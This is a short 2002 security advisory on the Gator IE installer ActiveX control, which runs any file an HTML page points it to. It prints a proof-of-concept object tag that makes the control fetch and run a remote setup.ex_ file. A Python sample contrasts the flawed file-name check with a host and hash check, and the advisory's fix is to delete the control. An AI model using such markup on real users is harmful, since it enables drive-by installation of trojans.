25th Feb 2002 [SBWID-5128]
COMMAND
Gator installer Plugin allows any software to be installed
SYSTEMS AFFECTED
Gator DLL version - 3.0.6.1
PROBLEM
In Obscure^ advisory
[http://eyeonsecurity.net/advisories/gatorieplugin.html]
The issue here is that any HTML page can specify the location of the
Gator installation file. The installation file is downloaded, and then
its filename is checked. If the filename is setup.ex_, the file is
decompressed and executed. If the file is not compressed, it is still
executed. Of course, using this method, a malicious user can easily
create an HTML page which makes use of the rogue ActiveX component to
point at a trojan file.
Example
=======
<xbject
id="IEGator"
classid="CLSID:29EEFF42-F3FA-11D5-A9D5-00500413153C"
codebase="http://www.gator.com/download/2500/iegator_3061_gatorsetup.cab"
align="baseline"
border="0"
width="400"
height="20">
<pxram name="params"
value="fcn=setup&src=eyeonsecurity.net/advisories/gatorexploit/setup.ex_&bgcolor=F0F1D0&aic=",aicStr,"&">
</xbject>
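The flaw described above is that the decision to execute rests on the file name alone. The following added example (not part of the original advisory and not Gator's code) contrasts that check with one that ties the download to a vendor host and a pinned digest. The host allowlist, the pinned digest and the sample parameter strings are assumptions constructed for illustration.

```python
import hashlib
from urllib.parse import parse_qs, urlsplit

# Assumptions: the allowlist and pinned digest are hypothetical stand-ins;
# a real installer control would verify a code signature on the download.
TRUSTED_HOSTS = {"www.gator.com"}
GOOD_INSTALLER = b"constructed vendor installer bytes"
PINNED_SHA256 = hashlib.sha256(GOOD_INSTALLER).hexdigest()

# Constructed sample "params" strings in the format shown in the advisory.
ROGUE = "fcn=setup&src=example.invalid/dl/setup.ex_&bgcolor=F0F1D0&aic="
VENDOR = "fcn=setup&src=www.gator.com/constructed/setup.ex_&bgcolor=F0F1D0&aic="
USERINFO = "fcn=setup&src=www.gator.com@example.invalid/setup.ex_"


def parse_src(params: str) -> str:
    """Return the src value from the control's params string ('' if absent)."""
    return parse_qs(params, keep_blank_values=True).get("src", [""])[0]


def filename_only_check(params: str) -> bool:
    """Behaviour described in the advisory: only the file name is inspected."""
    return parse_src(params).rsplit("/", 1)[-1].lower() == "setup.ex_"


def hardened_check(params: str, payload: bytes) -> bool:
    """Accept only a vendor-hosted file whose digest matches the pinned value."""
    src = parse_src(params)
    # The advisory's example gives src without a scheme; add one so urlsplit
    # separates host from path. Anything it cannot parse as a host is rejected.
    url = urlsplit(src if "://" in src else "http://" + src)
    if (url.hostname or "").lower() not in TRUSTED_HOSTS:
        return False
    return hashlib.sha256(payload).hexdigest() == PINNED_SHA256


if __name__ == "__main__":
    for name, p in (("rogue", ROGUE), ("vendor", VENDOR), ("userinfo", USERINFO)):
        print(name, filename_only_check(p), hardened_check(p, GOOD_INSTALLER))
```

The file-name check accepts all three sample strings, while the hardened check accepts only the vendor-hosted one, and only when the downloaded bytes match the pinned digest.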
SOLUTION
Simply delete the ActiveX component from %windir%\Downloaded Program
Files.